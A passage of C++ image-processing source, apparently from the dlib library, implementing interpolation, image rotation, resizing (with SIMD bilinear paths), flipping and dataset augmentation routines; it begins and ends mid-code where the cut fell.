tb_frac*((1-lr_frac)*bl + lr_frac*br); tl = img[top][left].blue; tr = img[top][right].blue; bl = img[bottom][left].blue; br = img[bottom][right].blue; const double blue = (1-tb_frac)*((1-lr_frac)*tl + lr_frac*tr) + tb_frac*((1-lr_frac)*bl + lr_frac*br); rgb_pixel temp; assign_pixel(temp.red, red); assign_pixel(temp.green, green); assign_pixel(temp.blue, blue); assign_pixel(result, temp); return true; } }; // ---------------------------------------------------------------------------------------- class interpolate_quadratic { template <typename T> struct is_rgb_image { const static bool value = pixel_traits<typename T::pixel_type>::rgb; }; public: template <typename T, typename image_view_type, typename pixel_type> typename disable_if<is_rgb_image<image_view_type>,bool>::type operator() ( const image_view_type& img, const dlib::vector<T,2>& p, pixel_type& result ) const { COMPILE_TIME_ASSERT(pixel_traits<typename image_view_type::pixel_type>::has_alpha == false); const point pp(p); // if the interpolation goes outside img if (!get_rect(img).contains(grow_rect(pp,1))) return false; const long r = pp.y(); const long c = pp.x(); const double temp = interpolate(p-pp, img[r-1][c-1], img[r-1][c ], img[r-1][c+1], img[r ][c-1], img[r ][c ], img[r ][c+1], img[r+1][c-1], img[r+1][c ], img[r+1][c+1]); assign_pixel(result, temp); return true; } template <typename T, typename image_view_type, typename pixel_type> typename enable_if<is_rgb_image<image_view_type>,bool>::type operator() ( const image_view_type& img, const dlib::vector<T,2>& p, pixel_type& result ) const { COMPILE_TIME_ASSERT(pixel_traits<typename image_view_type::pixel_type>::has_alpha == false); const point pp(p); // if the interpolation goes outside img if (!get_rect(img).contains(grow_rect(pp,1))) return false; const long r = pp.y(); const long c = pp.x(); const double red = interpolate(p-pp, img[r-1][c-1].red, img[r-1][c ].red, img[r-1][c+1].red, img[r ][c-1].red, img[r ][c ].red, img[r ][c+1].red, img[r+1][c-1].red, img[r+1][c ].red, img[r+1][c+1].red); const double green = interpolate(p-pp, img[r-1][c-1].green, img[r-1][c ].green, img[r-1][c+1].green, img[r ][c-1].green, img[r ][c ].green, img[r ][c+1].green, img[r+1][c-1].green, img[r+1][c ].green, img[r+1][c+1].green); const double blue = interpolate(p-pp, img[r-1][c-1].blue, img[r-1][c ].blue, img[r-1][c+1].blue, img[r ][c-1].blue, img[r ][c ].blue, img[r ][c+1].blue, img[r+1][c-1].blue, img[r+1][c ].blue, img[r+1][c+1].blue); rgb_pixel temp; assign_pixel(temp.red, red); assign_pixel(temp.green, green); assign_pixel(temp.blue, blue); assign_pixel(result, temp); return true; } private: /* tl tm tr ml mm mr bl bm br */ // The above is the pixel layout in our little 3x3 neighborhood. interpolate() will // fit a quadratic to these 9 pixels and then use that quadratic to find the interpolated // value at point p. inline double interpolate( const dlib::vector<double,2>& p, double tl, double tm, double tr, double ml, double mm, double mr, double bl, double bm, double br ) const { matrix<double,6,1> w; // x w(0) = (tr + mr + br - tl - ml - bl)*0.16666666666; // y w(1) = (bl + bm + br - tl - tm - tr)*0.16666666666; // x^2 w(2) = (tl + tr + ml + mr + bl + br)*0.16666666666 - (tm + mm + bm)*0.333333333; // x*y w(3) = (tl - tr - bl + br)*0.25; // y^2 w(4) = (tl + tm + tr + bl + bm + br)*0.16666666666 - (ml + mm + mr)*0.333333333; // 1 (constant term) w(5) = (tm + ml + mr + bm)*0.222222222 - (tl + tr + bl + br)*0.11111111 + (mm)*0.55555556; const double x = p.x(); const double y = p.y(); matrix<double,6,1> z; z = x, y, x*x, x*y, y*y, 1.0; return dot(w,z); } }; // ---------------------------------------------------------------------------------------- // ---------------------------------------------------------------------------------------- // ---------------------------------------------------------------------------------------- class black_background { public: template <typename pixel_type> void operator() ( pixel_type& p) const { assign_pixel(p, 0); } }; class white_background { public: template <typename pixel_type> void operator() ( pixel_type& p) const { assign_pixel(p, 255); } }; class no_background { public: template <typename pixel_type> void operator() ( pixel_type& ) const { } }; // ---------------------------------------------------------------------------------------- template < typename image_type1, typename image_type2, typename interpolation_type, typename point_mapping_type, typename background_type > void transform_image ( const image_type1& in_img, image_type2& out_img, const interpolation_type& interp, const point_mapping_type& map_point, const background_type& set_background, const rectangle& area ) { // make sure requires clause is not broken DLIB_ASSERT( get_rect(out_img).contains(area) == true && is_same_object(in_img, out_img) == false , "\t void transform_image()" << "\n\t Invalid inputs were given to this function." << "\n\t get_rect(out_img).contains(area): " << get_rect(out_img).contains(area) << "\n\t get_rect(out_img): " << get_rect(out_img) << "\n\t area: " << area << "\n\t is_same_object(in_img, out_img): " << is_same_object(in_img, out_img) ); const_image_view<image_type1> imgv(in_img); image_view<image_type2> out_imgv(out_img); for (long r = area.top(); r <= area.bottom(); ++r) { for (long c = area.left(); c <= area.right(); ++c) { if (!interp(imgv, map_point(dlib::vector<double,2>(c,r)), out_imgv[r][c])) set_background(out_imgv[r][c]); } } } // ---------------------------------------------------------------------------------------- template < typename image_type1, typename image_type2, typename interpolation_type, typename point_mapping_type, typename background_type > void transform_image ( const image_type1& in_img, image_type2& out_img, const interpolation_type& interp, const point_mapping_type& map_point, const background_type& set_background ) { // make sure requires clause is not broken DLIB_ASSERT( is_same_object(in_img, out_img) == false , "\t void transform_image()" << "\n\t Invalid inputs were given to this function." << "\n\t is_same_object(in_img, out_img): " << is_same_object(in_img, out_img) ); transform_image(in_img, out_img, interp, map_point, set_background, get_rect(out_img)); } // ---------------------------------------------------------------------------------------- template < typename image_type1, typename image_type2, typename interpolation_type, typename point_mapping_type > void transform_image ( const image_type1& in_img, image_type2& out_img, const interpolation_type& interp, const point_mapping_type& map_point ) { // make sure requires clause is not broken DLIB_ASSERT( is_same_object(in_img, out_img) == false , "\t void transform_image()" << "\n\t Invalid inputs were given to this function." << "\n\t is_same_object(in_img, out_img): " << is_same_object(in_img, out_img) ); transform_image(in_img, out_img, interp, map_point, black_background(), get_rect(out_img)); } // ---------------------------------------------------------------------------------------- template < typename image_type1, typename image_type2, typename interpolation_type > point_transform_affine rotate_image ( const image_type1& in_img, image_type2& out_img, double angle, const interpolation_type& interp ) { // make sure requires clause is not broken DLIB_ASSERT( is_same_object(in_img, out_img) == false , "\t point_transform_affine rotate_image()" << "\n\t Invalid inputs were given to this function." << "\n\t is_same_object(in_img, out_img): " << is_same_object(in_img, out_img) ); const rectangle rimg = get_rect(in_img); // figure out bounding box for rotated rectangle rectangle rect; rect += rotate_point(center(rimg), rimg.tl_corner(), -angle); rect += rotate_point(center(rimg), rimg.tr_corner(), -angle); rect += rotate_point(center(rimg), rimg.bl_corner(), -angle); rect += rotate_point(center(rimg), rimg.br_corner(), -angle); out_img.set_size(rect.height(), rect.width()); const matrix<double,2,2> R = rotation_matrix(angle); point_transform_affine trans = point_transform_affine(R, -R*dcenter(get_rect(out_img)) + dcenter(rimg)); transform_image(in_img, out_img, interp, trans); return inv(trans); } // ---------------------------------------------------------------------------------------- template < typename image_type1, typename image_type2 > point_transform_affine rotate_image ( const image_type1& in_img, image_type2& out_img, double angle ) { // make sure requires clause is not broken DLIB_ASSERT( is_same_object(in_img, out_img) == false , "\t point_transform_affine rotate_image()" << "\n\t Invalid inputs were given to this function." << "\n\t is_same_object(in_img, out_img): " << is_same_object(in_img, out_img) ); return rotate_image(in_img, out_img, angle, interpolate_quadratic()); } // ---------------------------------------------------------------------------------------- namespace impl { class helper_resize_image { public: helper_resize_image( double x_scale_, double y_scale_ ): x_scale(x_scale_), y_scale(y_scale_) {} dlib::vector<double,2> operator() ( const dlib::vector<double,2>& p ) const { return dlib::vector<double,2>(p.x()*x_scale, p.y()*y_scale); } private: const double x_scale; const double y_scale; }; } template < typename image_type1, typename image_type2, typename interpolation_type > void resize_image ( const image_type1& in_img, image_type2& out_img, const interpolation_type& interp ) { // make sure requires clause is not broken DLIB_ASSERT( is_same_object(in_img, out_img) == false , "\t void resize_image()" << "\n\t Invalid inputs were given to this function." << "\n\t is_same_object(in_img, out_img): " << is_same_object(in_img, out_img) ); const double x_scale = (num_columns(in_img)-1)/(double)std::max<long>((num_columns(out_img)-1),1); const double y_scale = (num_rows(in_img)-1)/(double)std::max<long>((num_rows(out_img)-1),1); transform_image(in_img, out_img, interp, dlib::impl::helper_resize_image(x_scale,y_scale)); } // ---------------------------------------------------------------------------------------- template <typename image_type> struct is_rgb_image { const static bool value = pixel_traits<typename image_traits<image_type>::pixel_type>::rgb; }; template <typename image_type> struct is_grayscale_image { const static bool value = pixel_traits<typename image_traits<image_type>::pixel_type>::grayscale; }; // This is an optimized version of resize_image for the case where bilinear // interpolation is used. template < typename image_type1, typename image_type2 > typename disable_if_c<(is_rgb_image<image_type1>::value&&is_rgb_image<image_type2>::value) || (is_grayscale_image<image_type1>::value&&is_grayscale_image<image_type2>::value)>::type resize_image ( const image_type1& in_img_, image_type2& out_img_, interpolate_bilinear ) { // make sure requires clause is not broken DLIB_ASSERT( is_same_object(in_img_, out_img_) == false , "\t void resize_image()" << "\n\t Invalid inputs were given to this function." << "\n\t is_same_object(in_img_, out_img_): " << is_same_object(in_img_, out_img_) ); const_image_view<image_type1> in_img(in_img_); image_view<image_type2> out_img(out_img_); if (out_img.nr() <= 1 || out_img.nc() <= 1) { assign_all_pixels(out_img, 0); return; } typedef typename image_traits<image_type1>::pixel_type T; typedef typename image_traits<image_type2>::pixel_type U; const double x_scale = (in_img.nc()-1)/(double)std::max<long>((out_img.nc()-1),1); const double y_scale = (in_img.nr()-1)/(double)std::max<long>((out_img.nr()-1),1); double y = -y_scale; for (long r = 0; r < out_img.nr(); ++r) { y += y_scale; const long top = static_cast<long>(std::floor(y)); const long bottom = std::min(top+1, in_img.nr()-1); const double tb_frac = y - top; double x = -x_scale; if (pixel_traits<U>::grayscale) { for (long c = 0; c < out_img.nc(); ++c) { x += x_scale; const long left = static_cast<long>(std::floor(x)); const long right = std::min(left+1, in_img.nc()-1); const double lr_frac = x - left; double tl = 0, tr = 0, bl = 0, br = 0; assign_pixel(tl, in_img[top][left]); assign_pixel(tr, in_img[top][right]); assign_pixel(bl, in_img[bottom][left]); assign_pixel(br, in_img[bottom][right]); double temp = (1-tb_frac)*((1-lr_frac)*tl + lr_frac*tr) + tb_frac*((1-lr_frac)*bl + lr_frac*br); assign_pixel(out_img[r][c], temp); } } else { for (long c = 0; c < out_img.nc(); ++c) { x += x_scale; const long left = static_cast<long>(std::floor(x)); const long right = std::min(left+1, in_img.nc()-1); const double lr_frac = x - left; const T tl = in_img[top][left]; const T tr = in_img[top][right]; const T bl = in_img[bottom][left]; const T br = in_img[bottom][right]; T temp; assign_pixel(temp, 0); vector_to_pixel(temp, (1-tb_frac)*((1-lr_frac)*pixel_to_vector<double>(tl) + lr_frac*pixel_to_vector<double>(tr)) + tb_frac*((1-lr_frac)*pixel_to_vector<double>(bl) + lr_frac*pixel_to_vector<double>(br))); assign_pixel(out_img[r][c], temp); } } } } // ---------------------------------------------------------------------------------------- template < typename image_type > typename enable_if<is_grayscale_image<image_type> >::type resize_image ( const image_type& in_img_, image_type& out_img_, interpolate_bilinear ) { // make sure requires clause is not broken DLIB_ASSERT( is_same_object(in_img_, out_img_) == false , "\t void resize_image()" << "\n\t Invalid inputs were given to this function." << "\n\t is_same_object(in_img_, out_img_): " << is_same_object(in_img_, out_img_) ); const_image_view<image_type> in_img(in_img_); image_view<image_type> out_img(out_img_); if (out_img.nr() <= 1 || out_img.nc() <= 1) { assign_all_pixels(out_img, 0); return; } typedef typename image_traits<image_type>::pixel_type T; const double x_scale = (in_img.nc()-1)/(double)std::max<long>((out_img.nc()-1),1); const double y_scale = (in_img.nr()-1)/(double)std::max<long>((out_img.nr()-1),1); double y = -y_scale; for (long r = 0; r < out_img.nr(); ++r) { y += y_scale; const long top = static_cast<long>(std::floor(y)); const long bottom = std::min(top+1, in_img.nr()-1); const double tb_frac = y - top; double x = -4*x_scale; const simd4f _tb_frac = tb_frac; const simd4f _inv_tb_frac = 1-tb_frac; const simd4f _x_scale = 4*x_scale; simd4f _x(x, x+x_scale, x+2*x_scale, x+3*x_scale); long c = 0; for (;; c+=4) { _x += _x_scale; simd4i left = simd4i(_x); simd4f _lr_frac = _x-left; simd4f _inv_lr_frac = 1-_lr_frac; simd4i right = left+1; simd4f tlf = _inv_tb_frac*_inv_lr_frac; simd4f trf = _inv_tb_frac*_lr_frac; simd4f blf = _tb_frac*_inv_lr_frac; simd4f brf = _tb_frac*_lr_frac; int32 fleft[4]; int32 fright[4]; left.store(fleft); right.store(fright); if (fright[3] >= in_img.nc()) break; simd4f tl(in_img[top][fleft[0]], in_img[top][fleft[1]], in_img[top][fleft[2]], in_img[top][fleft[3]]); simd4f tr(in_img[top][fright[0]], in_img[top][fright[1]], in_img[top][fright[2]], in_img[top][fright[3]]); simd4f bl(in_img[bottom][fleft[0]], in_img[bottom][fleft[1]], in_img[bottom][fleft[2]], in_img[bottom][fleft[3]]); simd4f br(in_img[bottom][fright[0]], in_img[bottom][fright[1]], in_img[bottom][fright[2]], in_img[bottom][fright[3]]); simd4i out = simd4i(tlf*tl + trf*tr + blf*bl + brf*br); int32 fout[4]; out.store(fout); out_img[r][c] = static_cast<T>(fout[0]); out_img[r][c+1] = static_cast<T>(fout[1]); out_img[r][c+2] = static_cast<T>(fout[2]); out_img[r][c+3] = static_cast<T>(fout[3]); } x = -x_scale + c*x_scale; for (; c < out_img.nc(); ++c) { x += x_scale; const long left = static_cast<long>(std::floor(x)); const long right = std::min(left+1, in_img.nc()-1); const float lr_frac = x - left; float tl = 0, tr = 0, bl = 0, br = 0; assign_pixel(tl, in_img[top][left]); assign_pixel(tr, in_img[top][right]); assign_pixel(bl, in_img[bottom][left]); assign_pixel(br, in_img[bottom][right]); float temp = (1-tb_frac)*((1-lr_frac)*tl + lr_frac*tr) + tb_frac*((1-lr_frac)*bl + lr_frac*br); assign_pixel(out_img[r][c], temp); } } } // ---------------------------------------------------------------------------------------- template < typename image_type > typename enable_if<is_rgb_image<image_type> >::type resize_image ( const image_type& in_img_, image_type& out_img_, interpolate_bilinear ) { // make sure requires clause is not broken DLIB_ASSERT( is_same_object(in_img_, out_img_) == false , "\t void resize_image()" << "\n\t Invalid inputs were given to this function." << "\n\t is_same_object(in_img_, out_img_): " << is_same_object(in_img_, out_img_) ); const_image_view<image_type> in_img(in_img_); image_view<image_type> out_img(out_img_); if (out_img.nr() <= 1 || out_img.nc() <= 1) { assign_all_pixels(out_img, 0); return; } typedef typename image_traits<image_type>::pixel_type T; const double x_scale = (in_img.nc()-1)/(double)std::max<long>((out_img.nc()-1),1); const double y_scale = (in_img.nr()-1)/(double)std::max<long>((out_img.nr()-1),1); double y = -y_scale; for (long r = 0; r < out_img.nr(); ++r) { y += y_scale; const long top = static_cast<long>(std::floor(y)); const long bottom = std::min(top+1, in_img.nr()-1); const double tb_frac = y - top; double x = -4*x_scale; const simd4f _tb_frac = tb_frac; const simd4f _inv_tb_frac = 1-tb_frac; const simd4f _x_scale = 4*x_scale; simd4f _x(x, x+x_scale, x+2*x_scale, x+3*x_scale); long c = 0; for (;; c+=4) { _x += _x_scale; simd4i left = simd4i(_x); simd4f lr_frac = _x-left; simd4f _inv_lr_frac = 1-lr_frac; simd4i right = left+1; simd4f tlf = _inv_tb_frac*_inv_lr_frac; simd4f trf = _inv_tb_frac*lr_frac; simd4f blf = _tb_frac*_inv_lr_frac; simd4f brf = _tb_frac*lr_frac; int32 fleft[4]; int32 fright[4]; left.store(fleft); right.store(fright); if (fright[3] >= in_img.nc()) break; simd4f tl(in_img[top][fleft[0]].red, in_img[top][fleft[1]].red, in_img[top][fleft[2]].red, in_img[top][fleft[3]].red); simd4f tr(in_img[top][fright[0]].red, in_img[top][fright[1]].red, in_img[top][fright[2]].red, in_img[top][fright[3]].red); simd4f bl(in_img[bottom][fleft[0]].red, in_img[bottom][fleft[1]].red, in_img[bottom][fleft[2]].red, in_img[bottom][fleft[3]].red); simd4f br(in_img[bottom][fright[0]].red, in_img[bottom][fright[1]].red, in_img[bottom][fright[2]].red, in_img[bottom][fright[3]].red); simd4i out = simd4i(tlf*tl + trf*tr + blf*bl + brf*br); int32 fout[4]; out.store(fout); out_img[r][c].red = static_cast<unsigned char>(fout[0]); out_img[r][c+1].red = static_cast<unsigned char>(fout[1]); out_img[r][c+2].red = static_cast<unsigned char>(fout[2]); out_img[r][c+3].red = static_cast<unsigned char>(fout[3]); tl = simd4f(in_img[top][fleft[0]].green, in_img[top][fleft[1]].green, in_img[top][fleft[2]].green, in_img[top][fleft[3]].green); tr = simd4f(in_img[top][fright[0]].green, in_img[top][fright[1]].green, in_img[top][fright[2]].green, in_img[top][fright[3]].green); bl = simd4f(in_img[bottom][fleft[0]].green, in_img[bottom][fleft[1]].green, in_img[bottom][fleft[2]].green, in_img[bottom][fleft[3]].green); br = simd4f(in_img[bottom][fright[0]].green, in_img[bottom][fright[1]].green, in_img[bottom][fright[2]].green, in_img[bottom][fright[3]].green); out = simd4i(tlf*tl + trf*tr + blf*bl + brf*br); out.store(fout); out_img[r][c].green = static_cast<unsigned char>(fout[0]); out_img[r][c+1].green = static_cast<unsigned char>(fout[1]); out_img[r][c+2].green = static_cast<unsigned char>(fout[2]); out_img[r][c+3].green = static_cast<unsigned char>(fout[3]); tl = simd4f(in_img[top][fleft[0]].blue, in_img[top][fleft[1]].blue, in_img[top][fleft[2]].blue, in_img[top][fleft[3]].blue); tr = simd4f(in_img[top][fright[0]].blue, in_img[top][fright[1]].blue, in_img[top][fright[2]].blue, in_img[top][fright[3]].blue); bl = simd4f(in_img[bottom][fleft[0]].blue, in_img[bottom][fleft[1]].blue, in_img[bottom][fleft[2]].blue, in_img[bottom][fleft[3]].blue); br = simd4f(in_img[bottom][fright[0]].blue, in_img[bottom][fright[1]].blue, in_img[bottom][fright[2]].blue, in_img[bottom][fright[3]].blue); out = simd4i(tlf*tl + trf*tr + blf*bl + brf*br); out.store(fout); out_img[r][c].blue = static_cast<unsigned char>(fout[0]); out_img[r][c+1].blue = static_cast<unsigned char>(fout[1]); out_img[r][c+2].blue = static_cast<unsigned char>(fout[2]); out_img[r][c+3].blue = static_cast<unsigned char>(fout[3]); } x = -x_scale + c*x_scale; for (; c < out_img.nc(); ++c) { x += x_scale; const long left = static_cast<long>(std::floor(x)); const long right = std::min(left+1, in_img.nc()-1); const double lr_frac = x - left; const T tl = in_img[top][left]; const T tr = in_img[top][right]; const T bl = in_img[bottom][left]; const T br = in_img[bottom][right]; T temp; assign_pixel(temp, 0); vector_to_pixel(temp, (1-tb_frac)*((1-lr_frac)*pixel_to_vector<double>(tl) + lr_frac*pixel_to_vector<double>(tr)) + tb_frac*((1-lr_frac)*pixel_to_vector<double>(bl) + lr_frac*pixel_to_vector<double>(br))); assign_pixel(out_img[r][c], temp); } } } // ---------------------------------------------------------------------------------------- template < typename image_type1, typename image_type2 > void resize_image ( const image_type1& in_img, image_type2& out_img ) { // make sure requires clause is not broken DLIB_ASSERT( is_same_object(in_img, out_img) == false , "\t void resize_image()" << "\n\t Invalid inputs were given to this function." << "\n\t is_same_object(in_img, out_img): " << is_same_object(in_img, out_img) ); resize_image(in_img, out_img, interpolate_bilinear()); } // ---------------------------------------------------------------------------------------- template < typename image_type1, typename image_type2 > point_transform_affine flip_image_left_right ( const image_type1& in_img, image_type2& out_img ) { // make sure requires clause is not broken DLIB_ASSERT( is_same_object(in_img, out_img) == false , "\t void flip_image_left_right()" << "\n\t Invalid inputs were given to this function." << "\n\t is_same_object(in_img, out_img): " << is_same_object(in_img, out_img) ); assign_image(out_img, fliplr(mat(in_img))); std::vector<dlib::vector<double,2> > from, to; rectangle r = get_rect(in_img); from.push_back(r.tl_corner()); to.push_back(r.tr_corner()); from.push_back(r.bl_corner()); to.push_back(r.br_corner()); from.push_back(r.tr_corner()); to.push_back(r.tl_corner()); from.push_back(r.br_corner()); to.push_back(r.bl_corner()); return find_affine_transform(from,to); } // ---------------------------------------------------------------------------------------- template < typename image_type1, typename image_type2 > void flip_image_up_down ( const image_type1& in_img, image_type2& out_img ) { // make sure requires clause is not broken DLIB_ASSERT( is_same_object(in_img, out_img) == false , "\t void flip_image_up_down()" << "\n\t Invalid inputs were given to this function." << "\n\t is_same_object(in_img, out_img): " << is_same_object(in_img, out_img) ); assign_image(out_img, flipud(mat(in_img))); } // ---------------------------------------------------------------------------------------- namespace impl { inline rectangle flip_rect_left_right ( const rectangle& rect, const rectangle& window ) { rectangle temp; temp.top() = rect.top(); temp.bottom() = rect.bottom(); const long left_dist = rect.left()-window.left(); temp.right() = window.right()-left_dist; temp.left() = temp.right()-rect.width()+1; return temp; } inline rectangle tform_object ( const point_transform_affine& tran, const rectangle& rect ) { return centered_rect(tran(center(rect)), rect.width(), rect.height()); } inline full_object_detection tform_object( const point_transform_affine& tran, const full_object_detection& obj ) { std::vector<point> parts; parts.reserve(obj.num_parts()); for (unsigned long i = 0; i < obj.num_parts(); ++i) { parts.push_back(tran(obj.part(i))); } return full_object_detection(tform_object(tran,obj.get_rect()), parts); } } // ---------------------------------------------------------------------------------------- template < typename image_array_type, typename T > void add_image_left_right_flips ( image_array_type& images, std::vector<std::vector<T> >& objects ) { // make sure requires clause is not broken DLIB_ASSERT( images.size() == objects.size(), "\t void add_image_left_right_flips()" << "\n\t Invalid inputs were given to this function." << "\n\t images.size(): " << images.size() << "\n\t objects.size(): " << objects.size() ); typename image_array_type::value_type temp; std::vector<T> rects; const unsigned long num = images.size(); for (unsigned long j = 0; j < num; ++j) { const point_transform_affine tran = flip_image_left_right(images[j], temp); rects.clear(); for (unsigned long i = 0; i < objects[j].size(); ++i) rects.push_back(impl::tform_object(tran, objects[j][i])); images.push_back(temp); objects.push_back(rects); } } // ---------------------------------------------------------------------------------------- template < typename image_array_type, typename T, typename U > void add_image_left_right_flips ( image_array_type& images, std::vector<std::vector<T> >& objects, std::vector<std::vector<U> >& objects2 ) { // make sure requires clause is not broken DLIB_ASSERT( images.size() == objects.size() && images.size() == objects2.size(), "\t void add_image_left_right_flips()" << "\n\t Invalid inputs were given to this function." << "\n\t images.size(): " << images.size() << "\n\t objects.size(): " << objects.size() << "\n\t objects2.size(): " << objects2.size() ); typename image_array_type::value_type temp; std::vector<T> rects; std::vector<U> rects2; const unsigned long num = images.size(); for (unsigned long j = 0; j < num; ++j) { const point_transform_affine tran = flip_image_left_right(images[j], temp); images.push_back(temp); rects.clear(); for (unsigned long i = 0; i < objects[j].size(); ++i) rects.push_back(impl::tform_object(tran, objects[j][i])); objects.push_back(rects); rects2.clear(); for (unsigned long i = 0; i < objects2[j].size(); ++i) rects2.push_back(impl::tform_object(tran, objects2[j][i])); objects2.push_back(rects2); } } // ---------------------------------------------------------------------------------------- template <typename image_array_type> void flip_image_dataset_left_right ( image_array_type& images, std::vector<std::vector<rectangle> >& objects ) { // make sure requires clause is not broken DLIB_ASSERT( images.size() == objects.size(), "\t void flip_image_dataset_left_right()" << "\n\t Invalid inputs were given to this function." << "\n\t images.size(): " << images.size() << "\n\t objects.size(): " << objects.size() ); typename image_array_type::value_type temp; for (unsigned long i = 0; i < images.size(); ++i) { flip_image_left_right(images[i], temp); swap(temp,images[i]); for (unsigned long j = 0; j < objects[i].size(); ++j) { objects[i][j] = impl::flip_rect_left_right(objects[i][j], get_rect(images[i])); } } } // ---------------------------------------------------------------------------------------- template <typename image_array_type> void flip_image_dataset_left_right ( image_array_type& images, std::vector<std::vector<rectangle> >& objects, std::vector<std::vector<rectangle> >& objects2 ) { // make sure requires clause is not broken DLIB_ASSERT( images.size() == objects.size() && images.size() == objects2.size(), "\t void flip_image_dataset_left_right()" << "\n\t Invalid inputs were given to this function." << "\n\t images.size(): " << images.size() << "\n\t objects.size(): " << objects.size() << "\n\t objects2.size(): " << objects2.size() ); typename image_array_type::value_type temp; for (unsigned long i = 0; i < images.size(); ++i) { flip_image_left_right(images[i], temp); swap(temp, images[i]); for (unsigned long j = 0; j < objects[i].size(); ++j) { objects[i][j] = impl::flip_rect_left_right(objects[i][j], get_rect(images[i])); } for (unsigned long j = 0; j < objects2[i].size(); ++j) { objects2[i][j] = impl::flip_rect_left_right(objects2[i][j], get_rect(images[i])); } } } // ---------------------------------------------------------------------------------------- template < typename pyramid_type, typename image_array_type > void upsample_image_dataset ( image_array_type& images, std::vector<std::vector<rectangle> >& objects ) { // make sure requires clause is not broken DLIB_ASSERT( images.size() == objects.size(), "\t void upsample_image_dataset()" << "\n\t Invalid inputs were given to this function." << "\n\t images.size(): " << images.size() << "\n\t objects.size(): " << objects.size() ); typename image_array_type::value_type temp; pyramid_type pyr; for (unsigned long i = 0; i < images.size(); ++i) { pyramid_up(images[i], temp, pyr); swap(temp, images[i]); for (unsigned long j = 0; j < objects[i].size(); ++j) { objects[i][j] = pyr.rect_up(objects[i][j]); } } } template < typename pyramid_type, typename image_array_type > void upsample_image_dataset ( image_array_type& images, std::vector<std::vector<rectangle> >& objects, std::vector<std::vector<rectangle> >& objects2 ) { // make sure requires clause is not broken DLIB_ASSERT( images.size() == objects.size() && images.size() == objects2.size(), "\t void upsample_image_dataset()" << "\n\t Invalid inputs were given to this function." << "\n\t images.size(): " << images.size() << "\n\t objects.size(): " << objects.size() << "\n\t objects2.size(): " << objects2.size() ); typename image_array_type::value_type temp; pyramid_type pyr; for (unsigned long i = 0; i < images.size(); ++i) { pyramid_up(images[i], temp, pyr); swap(temp, images[i]); for (unsigned long j = 0; j < objects[i].size(); ++j) { objects[i][j] = pyr.rect_up(objects[i][j]); } for (unsigned long j = 0; j < objects2[i].size(); ++j) { objects2[i][j] = pyr.rect_up(objects2[i][j]); } } } // ---------------------------------------------------------------------------------------- template <typename image_array_type> void rotate_image_dataset ( double angle, image_array_type& images, std::vector<std::vector<rectangle> >& objects ) { // make sure requires clause is not broken DLIB_ASSERT( images.size() == objects.size(), "\t void rotate_image_dataset()" << "\n\t Invalid inputs were given to this function." << "\n\t images.size(): " << images.size() << "\n\t objects.size(): " << objects.size() ); typename image_array_type::value_type temp; for (unsigned long i = 0; i < images.size(); ++i) { const point_transform_affine tran = rotate_image(images[i], temp, angle); swap(temp, images[i]); for (unsigned long j = 0; j < objects[i].size(); ++j) { const rectangle rect = objects[i][j]; objects[i][j] = centered_rect(tran(center(rect)), rect.width(), rect.height()); } } } template <typename image_array_type> void rotate_image_dataset ( double angle, image_array_type& images, std::vector<std::vector<rectangle> >& objects, std::vector<std::vector<rectangle> >& objects2 ) { // make sure requires clause is not broken DLIB_ASSERT( images.size() == objects.size() && images.size() == objects2.size(), "\t void rotate_image_dataset()" << "\n\t Invalid inputs were given to this function." << "\n\t images.size(): " << images.size() << "\n\t objects.size(): " << objects.size() << "\n\t objects2.size(): " << objects2.size() ); typename image_array_type::value_type temp; for (unsigned long i = 0; i < images.size(); ++i) { const point_transform_affine tran = rotate_image(images[i], temp, angle); swap(temp, images[i]); for (unsigned long j = 0; j < objects[i].size(); ++j) { const rectangle rect = objects[i][j]; objects[i][j] = centered_rect(tran(center(rect)), rect.width(), rect.height()); } for (unsigned long j = 0; j < objects2[i].size(); ++j) { const rectangle rect = objects2[i][j]; objects2[i][j] = centered_rect(tran(center(rect)), rect.width(), rect.height()); } } } // ---------------------------------------------------------------------------------------- template < typename image_array_type, typename EXP, typename T, typename U > void add_image_rotations ( const matrix_exp<EXP>& angles, image_array_type& images, std::vector<std::vector<T> >& objects, std::vector<std::vector<U> >& objects2 ) { // make sure requires clause is not broken DLIB_ASSERT( is_vector(angles) && angles.size() > 0 && images.size() == objects.size() && images.size() == objects2.size(), "\t void add_image_rotations()" << "\n\t Invalid inputs were given to this function." << "\n\t is_vector(angles): " << is_vector(angles) << "\n\t angles.size(): " << angles.size() << "\n\t images.size(): " << images.size() << "\n\t objects.size(): " << objects.size() << "\n\t objects2.size(): " << objects2.size() ); image_array_type new_images; std::vector<std::vector<T> > new_objects; std::vector<std::vector<U> > new_objects2; using namespace impl; std::vector<T> objtemp; std::vector<U> objtemp2; typename image_array_type::image_type temp; for (long i = 0; i < angles.size(); ++i) { for (unsigned long j = 0; j < images.size(); ++j) { const point_transform_affine tran = rotate_image(images[j], temp, angles(i)); new_images.push_back(temp); objtemp.clear(); for (unsigned long k = 0; k < objects[j].size(); ++k) objtemp.push_back(tform_object(tran, objects[j][k])); new_objects.push_back(objtemp); objtemp2.clear(); for (unsigned long k = 0; k < objects2[j].size(); ++k) objtemp2.push_back(tform_object(tran, objects2[j][k])); new_objects2.push_back(objtemp2); } } new_images.swap(images); new_objects.swap(objects); new_objects2.swap(objects2); } // ---------------------------------------------------------------------------------------- template < typename image_array_type, typename EXP, typename T > void add_image_rotations ( const matrix_exp<EXP>& angles, image_array_type& images, std::vector<std::vector<T> >& objects ) { std::vector<std::vector<T> > objects2(objects.size()); add_image_rotations(angles, images, objects, objects2); } // ---------------------------------------------------------------------------------------- // ---------------------------------------------------------------------------------------- template < typename image_type1, typename image_type2, typename pyramid_type, typename interpolation_type > void pyramid_up ( const image_type1& in_img, image_type2& out_img, const pyramid_type& pyr, const interpolation_type& interp ) { // make sure requires clause is not broken DLIB_ASSERT( is_same_object(in_img, out_img) == false , "\t void pyramid_up()" << "\n\t Invalid inputs were given to this function." << "\n\t is_same_object(in_img, out_img): " << is_same_object(in_img, out_img) ); if (image_size(in_img) == 0) { set_image_size(out_img, 0, 0); return; } rectangle rect = get_rect(in_img); rectangle uprect = pyr.rect_up(rect); if (uprect.is_empty()) { set_image_size(out_img, 0, 0); return; } set_image_size(out_img, uprect.bottom()+1, uprect.right()+1); resize_image(in_img, out_img, interp); } // ---------------------------------------------------------------------------------------- template < typename image_type1, typename image_type2, typename pyramid_type > void pyramid_up ( const image_type1& in_img, image_type2& out_img, const pyramid_type& pyr ) { // make sure requires clause is not broken DLIB_ASSERT( is_same_object(in_img, out_img) == false , "\t void pyramid_up()" << "\n\t Invalid inputs were given to this function." << "\n\t is_same_object(in_img, out_img): " << is_same_object(in_img, 